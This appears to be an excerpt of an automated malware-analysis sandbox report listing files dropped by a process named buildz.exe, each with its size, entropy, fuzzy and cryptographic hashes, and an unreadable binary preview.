                        Preview:<?xmlR....n...=....Q.........!..|.j.....*j.-..K...f.3O.o._E......m..M-..:i..I..GN.i..P..P:~....\......3t....HX\.QXE.Bk...r.XC:._.hN.I={.......Y..o..c..Db'.5..ak.|SD...-.....%.,..a..Cct3?4#:.{.5._.....{...X.....b..r{.l.....O...U[,RT.R....F..qg.......V.K...-........N.o......Z....(.m.H.?,>..k#2:.(..j.6....h,Q..Sp.Z........3.E........./..H1...Q.....[.l.......]*P.N..R.....Y.2..4...l.....?t.G~...Gf...)}..$R..c+.A.n}Z~.M..?..."....;..>a..28b.........WgN..7..:~e.-.C.....y.E.2.3...1hrM.~.E!.}..vz...:....PP.h.2}A...D....3.S....O~m.......Z....V..zWs..,..h....=(/.I......$. ...J.P..[..o.3... .V.=T.;`T...f~..E............v8q..i+.~.n.a.[?.6...{..\.[-.iJ.+.z.0m...5.bp...Y!;.Y.....e.V.p.....MYI.l.,...o..O[.SF.@..D.uU/s.8.}f"....KR....\@...l....2x^.if...z .~.\.|>-.9..........8{..../..q<...m..{+[...)....q..<........J...7...7...R.C....W.q...,f.c.U..5.&...]........6..........R.....6......}.%/..}{E........cM..../.hRw.....G.(...bg.T_...2...E......h4..}.@...@.h.a
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1719
                        Entropy (8bit):7.875718189721366
                        Encrypted:false
                        SSDEEP:48:pqFJzyx24y9Dn0DFq1igp/JekxXlq930roKUD:pqU2uq1Lp/skB89kroKA
                        MD5:F5D20642979D0FDFDA32651D37CB2765
                        SHA1:4793A1D19DA24697CE4C40EDE1537496DB4041C1
                        SHA-256:558E268BA6AFD2E0DB94208B8A1D953E290B36E07B9B3FFFB9EB0586642832EE
                        SHA-512:D15464A56B905583A6ADB0357508D67DF693B1DDE5CE188348FF4AF7A5F79AB308CF4F29988601570EF74E224E68AD9672B3B5704FA70489EC34D9547958ADB6
                        Malicious:false
                        Preview:<?xml.XTwiq>....Fg..-').pc....3.a....|..z..'.....X./..\.+......;..`}.7)..;..4<2Zn..$....(.%._].&{15.. W\...L.W.....CQ0.*.R..........U....'.+.`..^.._......B.m.e.."K...Y.%..i.g.......L..m6..F.9.I.).J..Y......#45..D._X....7EQ.....p".D.{.......\X.g......5.`..v....\$..../c..x.......V.W.s..HP.QL.3..]...f=...'b..KXkkr.....y..2.X.q?g........`.....4yq..OgJ..jI...!...}.}.L\B5..$|..r..T.Yg........@...f?....:....T..X....N} ..5...}.....MS..h2..8....<@.B!)x.iHt&..I<d...9v{.X....,...CT.%d.....E....{0....*.*.`8......nm...J.3..+....../.g.ldE<^[).`..}.4...5..........X.....|.."l....D..e......]....D.Q.........R.v._....C.B7.?.....!.F.........B#?D..d..y.c)..A...y...J.l.....X..b.......O....3.9H.....J$T..k..4T\..e..e.IIJ...3....1..i..B...........Y........v?v61.T...o.....=V.....J@....ld....s..-D.......M3..3dN.."c.5q...+.....h3c..k.....Y..-..,.iY.`B.k)....R....G....&`V>S]G....".i...I...%..q.zP..\...ZT=A.UE.,.<-.H.J....n.q.b....7oc....c.c..].S...]a.K.V....F/...{..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1756
                        Entropy (8bit):7.900328129489978
                        Encrypted:false
                        SSDEEP:48:IL3ccBKTo/bLAJ01P0ExM9x8CznsHYIghS05CoUD:m3c8KTo/QJ0Vvxi1S05FA
                        MD5:E25ABB7EF0B16824D4F12CEC0A561499
                        SHA1:D3FB90DA0BAB527FBA548CB18637B9DA0E8539AC
                        SHA-256:D565626F6BD80E2AA4D6E31E63A10DCFCD7844816D4D90B41E233113291C6898
                        SHA-512:47155478CE5A39799516245DB2D3DEFD68CB35402342858FDDC0985FAE3B82AA3AEB4736E5E92D0ADFC9035A93D85527775427D81EF3AA83B2D733D2B335C2B8
                        Malicious:false
                        Preview:<?xml..&..`.=...+.8.a..;....&.....u....5Y.....2.....z.v."?T..z23fr./r~.. .....Y...s.>....$J..n$L.5#....c6...?!..T.i=~.3.`k......z+-..X.@..L3.S.`..h.Ml....1{.[..0K...8.!..6nZ,..k........./.h-.q..v...-PT.Ue!...i^?.w....[C .m.c.....M./^)..../!..".....!.F....x.KB.s..n.G.}....s..................B.Z...K.1..#.M...1>.3...u...U.v..W........n....n1..1...O4j&.....&,..Z.}.ra...\.N...^?.L/...Zy..wK....C.......).N>*[..I.9m..Y..7........<.2#...f&....h+..:.;5..)Pq..:...>...W>..c......F2.Q...`....>........{2.....{:....ac.....U......Y....%..X.]....).y..o.5T......=..]....'w.....t...I-3b.o...f?]W...\....& ...a.C...&l&...h.p.....i....!.l.....t....EV?..?|..+X..b..%.E..r......&K..J......2T....X-..}.........5G..]*.-...H.W.........&.....o....G.`HA...TB.E.(-1q'.!._qR.[Af...G:=.}.b..).....@N_.!p..`&wj..I...;.....d.)..$.fJ7.... .L.^.DW.)9..3..R...6..,S..#.`C3.."|o.bc.#.......iz. ....i.....J.^xD`d^.[..z.Gv.}.......*.....-.|..s.bYD...Y.D.1..*...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1697
                        Entropy (8bit):7.868580096563887
                        Encrypted:false
                        SSDEEP:48:xNQVu+YdmWa/dLecCsKE/PzEhG9JWbbeDV82oaSUD:xxgtms3z6QUbeDO2o7A
                        MD5:156EA028595F4B5F052A98A00D74ACA1
                        SHA1:0DAA76EFFFF883A8D819D99D64081EC0A8BB5513
                        SHA-256:683045F145AD812D886A33DB6F63D2F6C23B0E6E246E0C46BCF3E36DC8D5DA17
                        SHA-512:12A92DD1623E209F4E697D1D993BC5DDC5B5EEA6A3DEDF185108B0D9CCC784F842EC924AA8093938920AAC0075D0ABC640DA22D06AA28D1105C43A05F0887631
                        Malicious:false
                        Preview:<?xmlxC.W.y.|........KiU..r....2..I...U...C...4..h*/lZ..~Av..{...X.on)...........%.l....O..H..1....^..L]g...j.[...-<.E......y.....y....%a*..C..p..U....x.yk...&.{8le.vU......o...zJJ.....WY.0..+..e#..^[7`.d.z,-x.LJ....a9..k,G.>DC.w....+....... ....... ..@..]..J}..'%..;.)X1+. .H..7#:....v.._..s......7....H....:....3..DZM...,.z..f5..&..w6j.D+}'.M......[.6..Q.S.a.h'....Em........j)<...w.d.-=.<#..7.......(3..+.....Y.oB.P.Z*.F.61q../.X.....}.>...].(.lW(.l...?."..,HZn..<.>.*.....K>.[..{...[.T..V.~.....GX.<..a..s.k....K...2s.Z_.l.K..\c.~#1@......dL.>5sy.R..`.>...@..}....A.x........?.a..W.w.@e.........1.T._X.{.2....8.O..8|..KV.6...-..R.).9.)0...u.n.......1.......7.B.....~\.}......aP.y...H...........Xh..gu.K$....[.t.....}...7..o.<P3..!....)........P..X.f.m...C....ye.z..........hP...7.....;.....m.....d..F.pf%...0.,4.....:f...4......N..p.g.e...p..&.BQ.s4`....Nt.^F...........Y/d.H.mp.YH]w..Ic.....U>...K.....~y.......V...x.-J..........j..{....w.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1734
                        Entropy (8bit):7.881060197322651
                        Encrypted:false
                        SSDEEP:48:G275n0BYOYrBG7Nzuxbo+5mPckpqzdLXX741yaBUD:G2750BYD9qTPdpaFEQ4A
                        MD5:C9834447BD9ABB16C844ABEF1EE6E583
                        SHA1:A820396BFBA5213C26E2EF7B4399036261DBFD99
                        SHA-256:252ED3927DF360E7692322AC8FE42F982016B806D7A7C60E55DC6505214CC7C0
                        SHA-512:1CE668F9C9850AD9577CA90190C334EFEBE74DF09415806EE8236A0CC8D777F7997CADA5F55C56B03846E32C4801873DD38AA103B5CD1CB2E97D6CF0262BA4DC
                        Malicious:false
                        Preview:<?xml8d./Ip*.....M]...6.......kbA...^.......8P..1.....U.......L.....&Y".gC&.C.....#O.8..H..8...*Q;y....Tp..._^..&.......#.x......=Q.e"...qo...........P.......?...Lb....w.[..0s3M.).~2.M.S.....Z.J.[....Go...NI.5. ..un<T?G..7&.b.d...|...a...h.....R.N.:.4............_T.A5...J.O.m*......._..SE.{^...E...........z..T..:...*.....pF:..HF...A..%...t0!.U.......>..gM.K.........N..>.j._....q..1.............D..|..S6..w....c................m...@...Bc..].b...)..U*.......R.#.m."VI.b.._0W^....kl..;.i<mxR.a.s.;....!a../.t.._T....u.....p8.0.Dev..t..rt.D@.;m7u.7B.&j.L(k..=......q.b.3c$.Z....L...K.%.....c........SF....ti..i..H/W.....A.@..}. .....b.Vq....z...4..~=?.....j.Nz....P..&t...|....79z..NQ..6:y.. h:)..c.7.m5.K...*.)....][.,...:...z..Q..0..^...iu.to.w.z..0.0..Z.9...S..jF..n7.v.h.pW.G...T...........#..f.n.D..%[0j.{.sF.Q..).P...\..h...N,y......63....DeR.mO7(...1.....y....7h.D.W]..l...x......s..B..-j.../.D..`Ar...."......OR.. ...5r..Ka..1..A:...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1699
                        Entropy (8bit):7.8913613288311675
                        Encrypted:false
                        SSDEEP:48:IShsyACOhXlvO6oB+t3pn4Vxd5fEuJHUD:ISaTCSMjg478IHA
                        MD5:CA90A549F0B11740BA44188236638E8A
                        SHA1:AFB64794454AAA3965D05B67CDBCCF94462469ED
                        SHA-256:E64745356F371FBD87BE1BA05DDC257448153AD11E71AB5492EC9A6EE5796822
                        SHA-512:2B69DBF493C2FAAC0D39BF828E29A814225573E9C420C0873E694AD3D4948562A3BE607C29A0197DACE71488AFE55041FE4661A9875592EE9A283DE962C5D260
                        Malicious:false
                        Preview:<?xml..\E.GB.2)(Z..(<....w%=4.R'T......S..y...-.@...5..%..=.).....F....3.....A.....XHB...BO...uP.".UX..n4..%.Y.6m.8c....<....G.G.....i.....Oh........V....6.p.p.~.Y.?.`..b..a.eX.x.....-'/.....g...%....:t.........MW...1.B.U9.&...A.....E+Y...nGG.B'k....Y..R...U.4d.X...I....p.i.$...r$M)..!...o...................Ol...8....V.2$.....o..X.F...oC..%.|..>..a\;.wL..r'.#^.L-.....d...DCg....JwK.4|\..*........9..`x....\.Ub......793.....`......../..}A..H.k.../.....l.J..-.$V8h6..j4...[.a...Z....CF....i..E..#....*.m#t..]...?n.A...1...$.D..g..cT.5D..O....\.1N.......e.(.....!.......T\...Q+.L.>. <.G...eT...'..0].>.....;....0......h..y.....d-.}v&k..d.Y..Ql.....(....../..t.3{c-...q..r(l.m....I.....0.Z...;.x..2....Os....8F75.i.;#.].M.o.......~... }..z?SQ.....06.J.....V:.|u.0m.e{0:.zy8............Pxh.p.>..f ..F.p&..B..?.../......2Dm..z4...<.^x...r..D.3..y..K..-...N......y...... .P.iQ0....X..^...;`N.4...!.JE.'.\.../.z.......2S.3..u9c.Hv.d.c..'......|.i...Q
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1736
                        Entropy (8bit):7.873373270834062
                        Encrypted:false
                        SSDEEP:48:NDPFW857jODgIN0V9de1lCTV6s1Y9I8grCqfRXUD:VPSmVGrC2xgrlfNA
                        MD5:FF08292F08B52DF549116D2F930E6A47
                        SHA1:06F3B6654E2FD005AB67FA796B578963E73892D5
                        SHA-256:4A80264B9276437996DCE4A56A1AAC63EBCA40CB006D2593E6258576E69420F4
                        SHA-512:FF91EE4CA95C4A6F2301E17D809705D28D7D06719218DF050012AFA7AE8F5B09D2A72D55CA20D98C23CDEB842863138C4F425CF60B9ABEC7D785192F67DD73AA
                        Malicious:false
                        Preview:<?xmlU_8N>s..BbM.?I...{j06u...T/.......(j...a...+.I.|r..L.Ipxg.`.xA|..&...FP>......J@.6.kV.........K..........e...._.L'"$....?8....s..1=....Y%cb...@._.Jz....A..[.9a.!.GB.......OZ"6....x..z.ot|..._ T.E.........K..^Xm....q.Z.T..C......=.....lw.DsmI:......z/...~AA.M._9...X...Q[..F..6.I".B.F....].B.......%.0{..G..2..U....aqs[O..(.G./X&k.$EO..(8.5..-..Q.*4.U......'....=m.i.\A.....{ ......kam.....{4$....X..{.#........zPu.n?..Vi..._.....(.K..=....-........J./...h..m...I2.OR...B.................eud.SLx..)...)....l..3O....C.....|W....f~B......k..oK..8.k..".B...x....q...Jd..,.....3=\....#...2{..F.R..1.x~.%U.......A.$..i.hyc.....~......N... .E...2O>.gR.a....m...h.....`.o......`.Y..q..t.._.8..>..=.....X.ZW.<..........3.`...I$.../'+./.[.3.J...&...S4y.M.{z...a........}^.O..9n.....\...)..o..q.\P.(.D.f.L...Z..h|K-....8.HE...().....V..6....z.Z|8{k..-._}..O9......)(z".V(.YL.Z4.Ok.G........k..O].....D..c.....=.....5O.z..5.A.....^#.`q[=q...".).
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1704
                        Entropy (8bit):7.862564679572466
                        Encrypted:false
                        SSDEEP:48:6kGU3b5b/u2kIIkYVZPk0VKQo2LdRYtAd9fCUD:6wy2k0YVZPkWo2LdRYqd9fCA
                        MD5:0279DAD9D50335659DC787BBF38C5EC5
                        SHA1:7E023BD57F17575377649CEC950297270A0510C8
                        SHA-256:FC359AA70DBA6662616E2252DF58723B79452079A2451EE5476401FB9612AF9C
                        SHA-512:6B41D82F6ABECE3BE4C01BAFDA15209AAAEC8AD020C76F9161EFB2F64F99DF8967CD45491526E3727EE14983B7656D58DF1D038411CBF24D6F26CC13620F88C9
                        Malicious:false
                        Preview:<?xml?...q.qk...60v4.).m?..;u.K.h..Q......xE.;..U..&O.<1.AmZ.?..)@....W"..I.&?j.4i.gQ.uF2.aN....4U.3[..ig.uV..O~...m.;&.}..2....dX.2H.o..!-.p.!....X{.T..]..Y.....v.Z..V..tF'..~...J.V........./6..{cH........[.PvK....6...f......N. Sj. LN.....h ...h. .yh.Gt.t_....k!.}..d......;.ZvG.dO`.Qi....:...l...Z.......?/(&Nnq..I..H.4.t.I...'.lJ..)..#.......*=+..H......a.y&,.....Tfl........"p..,..B..gn.%!.....4.[t..<.O.Y....(.O{2..(.*..w...B(..Q..Zi..s.......#a.<r:.;)...)..i%....m|.!...@.....T...c@@..O.Uk.p....Z~..In.EX...(........+.E[.O..w.....j....H.....Qys.. ...d.r.....V.?T...1..Os...>.6.9........D.0.4.C....._.83Wk.#..O..(.!|...a.qY.v.*...'%.l...qAsr..;_Y."X.9.....f.....G.....i...q.....1..U.......cOm.6%V......vs.8..C..&8tfHD.OGN;.....O..>B..a.._U..S...P:.u.y.......^7.../..#.60....q..V`....\...p~....c..}{..a.g......r.C....E...._rG..(9...w.}....GLv....7d..P....;.......f.kv.75.......-.T..Y.._ib2..\..!._P..4R.KayV,[|..j:...%.H.}...P..+g..).~....N.:.../."....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):320676
                        Entropy (8bit):6.63314513323505
                        Encrypted:false
                        SSDEEP:6144:Sb5Dtw92lW/x/vGQJYzr9twWBBzmfnDYSu:SbNteRvGQW7lBSLg
                        MD5:E5FA996CD23490E24B20C3F96C86F127
                        SHA1:93C5424421B737B107B1F86C2D38FDF4D8ED016C
                        SHA-256:2447BF4901ED770B8412FF67CD09011726D601EA5C10B706C440B668C3342A09
                        SHA-512:459E313BC6104C4AC03EB124F79D92942E2CD8017A7C64FBBDB3DB98FF5009D061F020B441763892FD18968235584392E55F8CE080F5E29F1BB2F38CC6D2C26D
                        Malicious:false
                        Preview:<RuleG..9.h.z[.;n..........!'.3....}v9.!p.L.x`..". j@.V,w..../g.@.+....XL....x..K.j.u..x....X..~.**....y..[C...@L...f...p..T..{.&O.......9....P..j.........L.T......^...8..HA...@>G.|.sD.H....L..E...*.R%m...H?p...".........@.b,0.p<wr......X..h...g......BP``'.$.#.f.R.`.?...6.aC.^..]...!L...=...#a..g..:..@...../+.V(...7^hv.z.01...._.).%$.9=.f...G..yd/d..M$6...a...C.L.o.gL...^.......s./LjnF......s....d..r..5u9,O..8..m1....b<m5.(.P.J.$7..3m8......D..7....*...@([.b...L..S......6h.X..>H.\.9bQ`..u.U..$q..E].j....d...../...4...G5.*U.6.;V..s ..#.g.......K^|.b.|+S<....S.P....*H..1.1o....f..h.H.;....A.v..._..vZ.r.3@....&....N...=...|...#....-z.......!.......C:^.W3.Y.k.z..2....+..g.`..CQcyz..<m......e.%,/......E.C.).o..^/..-.9..X^.v.d@O...'/..mW-.b.a.|.....l...v|P.!.G}{....~.R.t.=..Na/...hF_..c........^.r..{Q....l.d....$X.....T...h.........[...nf.y.h....B.B...-.....b4....;.. .!9....o.:..U..j..S.9.1.i.K.>...}.=.A p.n.w.'..|od..K.eQ.9..*H%.rR'.N.:nG~.f..xy.?
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1711
                        Entropy (8bit):7.86307584195436
                        Encrypted:false
                        SSDEEP:48:QobJ7ORzPlcfHsrjWCSO37llZYZVYqwNyG1EN9D/OKmJEG/HUD:jJChlcErjWwLl/YjYqwN31EN9D2RA
                        MD5:348836BE603308EB7C3AF29BD62E6DDA
                        SHA1:2BF894E5CF130E805FF071DC4A27E7ED4001F2FD
                        SHA-256:A16851D821CE67F060D5458CDA2B820D619366776449FAF19BEF839ECB599016
                        SHA-512:2207860EF11BA8A67102C7C5421D1FEAF9638851AEBC724977B82FA0A3B588B10D92B977CF67EF205F57D2D4A6E42C224E39BDFB502C0CE22D44074760A546B2
                        Malicious:false
                        Preview:<?xml.n..L.....}3...%e..y$.(....9a......../.]"^B%."...........T...u......N.KX,R......vO.}......3.a.X...K....Q.|...BL.H..U......&....._W.<+..,V..2\.&.....&..NX.hJ7......}.....j.......T..G......ap?........|.......x.[...w.,b....h.$.*+2..}G....j.Av.B..............]..vk..~.....mG.;....O..]09.|..h......1h..(.sb..x.ja`$_7.2Tg..uO...!..xB.c?~.;9.g....Q..E.E.Z.6.j..]..m... ..].........<....L.....P..*.R1..9X...@.g...Mk.3....W...h....*f.....z@;j.#.........p..cN.....V.....8.\...[v.e.N...%:91YX..l....|.g;.7ae......}6..A.....Y.p+q...M.Fz...5K..9.M^j.9.z.K=.........e..........Bs==lQ[...A..`..3Q[G.+UP=>"X.t......1O]G.lx.}n.YS.`w..^x!;}.",..P~.L....T?~........B..K....UUg..9t..P..N.ao..R.d.....ZKM+.H.e.2.E.>...:........5...H:C../..[.y.4QH..U..b.....^!D...m#,r....0....U.:u..%.{.o5..*..w.'..[...v%..X.:S.n.:\.~X.RH.t...a6..9...x....&D2C`z...J.[@..>.j.N..v..V.RyLV%...._.....8o.{N.z.....D|Bx..U0.....a.z`.$.HE=k....4;F.T..F.1.>.Df..-'W.....{...W..9.lx..N..Ja.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1748
                        Entropy (8bit):7.8881769253367136
                        Encrypted:false
                        SSDEEP:48:kATwZAPvXNT0tsZVdABWgATAJK9lQBT/fD5dGkMUD:kA0mN4srdvgU9lQFf9dGkMA
                        MD5:182BED6FE49290C7A37BEC8D83B84757
                        SHA1:21B19F366A58749E5434E1328D80B22DF328CD81
                        SHA-256:758F39C3EDFBE91C7ED71121ECE6BCFDAB7BDBD3C4550AB04266ABC04EAE29F2
                        SHA-512:712AA3D779F4029E47E61EB306E85A0EEF8188A5875F40B3DB48C6370A26C580D81C02FBDFDD4D93F4A2DEBD05A189DC5430C03B5F72D4A64D47B570C7232F2D
                        Malicious:false
                        Preview:<?xml D......(F.Xa.1.2.`.<.=.X.T.<)..N.z5r.m.P../Q!...GD@..R.9.`R.Z.....C.c..3.x...L...2+.....a\..*[.Y...7.....l.d...K..FDV......+._...v.@W.E.?....O..9Qea..M.Z..W.;..\.a.U...2iUH.+...\.......6A.T.P..B.qk.2'.E.....S..$']F...|A.$..D`<716L.....p..di^b.0.sM...s......'%....#b1<4.......j.....a..&_.:.!Z. %P.P..F......Zx.^........F...e8.x..Ha..J...h..-.4..f........._X=0..Lm.K..1.....!(K..Y{...bm...J]A;.#..T...!0...Nr...ShUS-aK..R...........Cl...'?Y...?...._'.. yQ.?.3C.`.Kwn......J.....Q....Q.OG.k.....s.i...{Zo+4.i..#....k.&'q.....9.i.l..UQ.T...TJ.A..sK.....A....L.3c......v....._.p.5jG..v.H_.e...,.d......z...No..H}.4.F<.'y.f.p...Eu>.....].Q..2"8.E.D1..7.H.!....":J1.vh.....A|j.X[........N.k.....T...};....T..wn.EP)..S.....?#2.V..8LE......Y.....pr..*.06.=<./W..v........h$....Y.....z]..p.j.c...b~H. y...|*.eI......{.1.>c.I-..........o3.Q;.8..H.....k.A...$../...g.$V-.... .8...*..U..~..J.B....+|.:\.]>..7..G.kS.A..D.'.z...v..Xd....M.,.......a^l..u...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1705
                        Entropy (8bit):7.8923252789974665
                        Encrypted:false
                        SSDEEP:24:miRnO6Hmrk5BRkWiHJWswWqckKTa/z5FpqVWKHytmQgJnjdIkDKfIouePu+xGbD:vRnf75nEUWqqsz5F4Yt9ojEvUD
                        MD5:0136E7689C557AA56379D1EB75237C3C
                        SHA1:BA9E7661F96FE36E0366EB4AC961737C8CE925B2
                        SHA-256:B5608F9FBB1C3A9140BED071ABA698AFEE340ECC2562F1CBDC83AE4EC98ABA88
                        SHA-512:3EA6BDCF3FAEA731D66D797C0FF3E757628C8A68DF4EB191AEE2025B8A8E8B28E88555F1315C1F79C7516851BAC3EDA43B0F16D3F495167419730CB132DF6A44
                        Malicious:false
                        Preview:<?xml.Z.u........... .._..p.p.g...d....gND,...^`rp J7..*L...c.B.....8....^...au.'.=...ZE.t...~..Z..yY..k..V......6.C..+..g<."...q.g.LU."...C..XW...Q...C.e.<?....Lkx.....j.;?....IL....bNn.t.......BI..,x...T..{2.N..+.J.)P....k.........=.X.^X.0/.&..B..l.+.............1...U..K...._.%{..P.k.A.$..hQ:aPzY..)\W..C!..}...H.3W...:.X..,.....3..YFv.%.W...O...!.Y?.....e.u...&......U]..,6:s.Uw.q53.A......H..9..mog....\e........m..p...Z..8Z...5A0.*.wA....ON1-....*......6{.....HA.B*.v.....K.6...pq.yJ.0.....oNP..*..G.q*(..wd..h..v."..M..P..E.._..t..hJ.....d...z....>.\_?SlZ..?..yr.X.&...u..m...:`...E.&....M2..h'..."......}4.........n.NR....Y.\..D..V...V.......7...!.../F...|~?e.7.@..B.#.p.(n..._...r~R.S...[.).Ss..2B.%.......@).I.:.3.b...V..LUJ..`l..o....t)..c+.;...:.1...........6..[<.....gg......%R..&..".].w..X-..).6|.(.^Q....n..).....G'.C...{-,K.^.-...;_..>O.*..`.{....*&x......J.<...L.Y..Xz&.F..}....h.*G4\....;d...........&X.......Bg:.=...%Jx.`r(.4.o
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1742
                        Entropy (8bit):7.888643815483024
                        Encrypted:false
                        SSDEEP:48:Zr5opiKAFEOjaDOa2EgJ9IXibAgnN8YF2MUD:t5optft20XiU7OA
                        MD5:8F79AF77E7F93C02A4A5E717EEF48204
                        SHA1:21D8B5C852A55E28C2160849670EEBDD80EE0D0C
                        SHA-256:2E41D3ABA0C2010511FBA245718D251528FACF720EDB71C4972D7432DB3B820A
                        SHA-512:F7362514228FB678AF9E33548AF019040C2B9DABB5FB5E9540D8477B225ACF93C0D333FCD195375649F448A098F48223AB9854A36B5AECF6C34D3697E4B9009A
                        Malicious:false
                        Preview:<?xml..*|*. .4.x.C.i0e.s..z..\!=.~...Z.l.3........I..p.{.f....K,........@.*...a..._~P..&..8].@L`.u.7....1..)5!.n...h*.;.y...j...........p^Gb.......T......&.....vumq....fQu;...wU...[V...=.1$..RjmY...Y.K$~...y..^.!...B.4LE8.$c...C..q.Jf..T..A\.M;.;]fb{so......rI..?..t4..M......$..6.KV.3,.....S.....*.....`Y.-.......N.h*........wt........j..(.9&:...A%U._.f.....A..#...!31~)...R......!..FQ......O.z.y..4.2..E..d...7.......w...f....Z^.(.1.R.s(.C.....Z..].......9r0.V..B...M.+.{..Z.%....Y..?....2.Z..G.G.V...!./hHUrj.UH.....D.n .#.X.^h.i.L....:..^e"........Q0....m.......p.q....y..i.....I.BO.a.......zw...%|..s..6..c....8..k.......|.X..2|L...Q........8...n....l.P.D=.XGAJwf..acDT.......r.F.>.hN..xYXp.........it7U.f..tvn7`6.t.N....xx.$......R...G.Dh....N.Y.b.?.i.....f.e.K...P...&.......O..A..Bx..7...L...h......A.....H... .^x......M....O`.$CzW8.d...N.>z>.l?..P..i.h...S[....A!.~..a9....l$ZD.e.....|A.5^lj.-D.4..n....~..*%.D..,D.....9.A.U..$.*...8..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1691
                        Entropy (8bit):7.887045869905236
                        Encrypted:false
                        SSDEEP:48:iwBDB8cenN35VyI7aZRr29akd28cNMT70RrUD:TBDmceN33gRi41Na0JA
                        MD5:7BD329406C741FC8060AA9540B741417
                        SHA1:26DDDFDDFE54639534E1E8CD20E68600D4CA26D7
                        SHA-256:14303615EF1E35DBA67856BA3F5FC04DFF43C42162725A9629835B7AAFCBAFBC
                        SHA-512:3C2923864A387C64EA2CF90E5B25EB71A42EF651DD7A112DFFA499272B22EA5A326C3A1D1D937809064A8CF040B8C3F07A8C32622D513B751EA30F34F17F244C
                        Malicious:false
                        Preview:<?xmlh......F.....q$....p.KJ}.K..}...,....aM...,.NJK.;.{..'....".....fo..\,..u{sI.lHL.9...}...Z..F...n4........A.....].Dw|_N.TB.W.../[.X..m.+.#o(.f.._...yiT..Z....*..~!..H.1...}........^.....)...4.P.Y..Yab..l/..u,w(..z;..K....7......x._2...`.)g.B.7...z..B%.,......1...<s....H...3pX*...'n.`....5.E.uF|.......d......2n..%.<OI....Y.!..Nt...T.*.`.C.$5.'..@,L ......He...>...$...v8PUi_#Dfd?...W..,...-U>..h.Ek.Z.b+.]..`..l.. 6.c..]f.`.......a>...P...0.g.h.#...q..k.a..k...h.4....X8..%.S .l].|.Y.....W.....O?....J)d..\..GY-..vF.7...w.>...Qb...e.t...._........m..$G.@59 .._AX........!......Dd....1.:2i9.C..TF.).A`.Cw..Kc+uQ.d.#:_.G..+L.....ND.J..........~.Z.f#.}.x.?e|.... ....o|t3.Q5...OC./P.8j.<.V.I#..{...5.8...2...^....o..T.>..).m...>..C.i/n^.z.9.l\*..a9|.[....+....:}..a....{....g.."..8..s.I.^.%..vH)p.^.=.-........(A..$....\3...v..p..u..{..dd..<...\).m.:.....u..({.Tl.\..8.$<....._....SI...g...U.r.M)....x....".@.'e...t.*k......k5... ..<..".E
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1728
                        Entropy (8bit):7.888964255839172
                        Encrypted:false
                        SSDEEP:24:8RtcdFzse7HVNBDwnFwgZEpa1kiUfhf0PQokdZlYasbzo+0UYoCp6ekFGmG/GbD:qtOseLVEnFw8EEkiUfxd0IxoCgMmG/UD
                        MD5:3FCEE00895C7A83D040EAAC7BE0A67E8
                        SHA1:78C593C80F0E98D89213AD0A2B03C19B5E4B0FC8
                        SHA-256:5E1339E2D78DA00298A65E192258DD1594B1AA1D4EFFCE94CD502BF0AD8A956E
                        SHA-512:353A1C0ED85CD872EE866511C2980A2475320FA369921E3546AEF3CCBFCDDDE19E1ED0CE5BBAC94CF04E148DF8D553B2B42ED2A82506B163A065C88914F306F2
                        Malicious:false
                        Preview:<?xml...O".....?..q.]cAB5..O...d.o!....$.\`4-y..l.E...c..D^.m..nw`r|.LQ...AO.7.T..h.V.}.T.B$..i..~u.....~....)h^...o..c..f1.,4......Q..C....=PN.L)..?mkb!&.C.2...M*.V@........;n.J...NTE..Llt.b#.7.1.c...k...N2..... .5...k..^...b.dv.^V.s....D.6Ba..q. ..v~:.S.Ec..3.X.R.8Z.$&.s.......t.9.....oo..H2{)Yr...m.%N.@............-m.r..3ey..!..3..L.7F)y.$^...X.....1......V...uX...yF...d..."_...{..W]}.A....y.~..@.o..6....&k..\.V........>..z.Y.7./.K.d.p1d...f..(.(..N#...=')0.....3Z...g.*h.....G.............+..y.1.<..b...H7.+IMU..i-..V..]...[...C.#.O[@...7JH...G..S......e..x.}..........c.T..a.....,.7...=...ji.=...g.......wp..9..a.N.DgVler/;.%5.....&`\.`.).D<..M..&.(..Z..iN.....D...U..2.g}C.c.MYz..u0e(<..........z:0...`.o.O~.#..R#.85....y....%..1Sw....d.!O....E....zl...x}.'.CX(._!Q.Z|E(......J.Pv...d.E..G..9.=vA...M. .W.|n...+..R.6...5.e.J.u.r..>.....E.......@!BV.|S=aWJ~.%...~....... .....H...`....E.4X.z\..x..ZsR.@^....._\.2BBX.t.....P..0..x
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1700
                        Entropy (8bit):7.883103160641987
                        Encrypted:false
                        SSDEEP:24:D9mbu3H8vIXEFyiMuLJ2kLahPIrimusKJfVTZ5cTdhoPoBPuIJqeQGbD:Ma38lXVLJ28aFait1VYYotFq/UD
                        MD5:2CEE38AD1AF99CC5A4F2DD12D89C45A2
                        SHA1:78133C232C5E2EE8246ED2BD7F4F4F141876B3E9
                        SHA-256:7D5711561A9ADB711E62D411D169D9162A4B276B3A9327D94FF68CCFA6C8B981
                        SHA-512:FC09910FEBF2100A3D7004A0639D2B5E76AF76B0E369D7EA7759FCF687136B8D9A7F2CD03349E176DA569AEB3C4D7DA01B65DF3FA0358C8448FA67ED17091067
                        Malicious:false
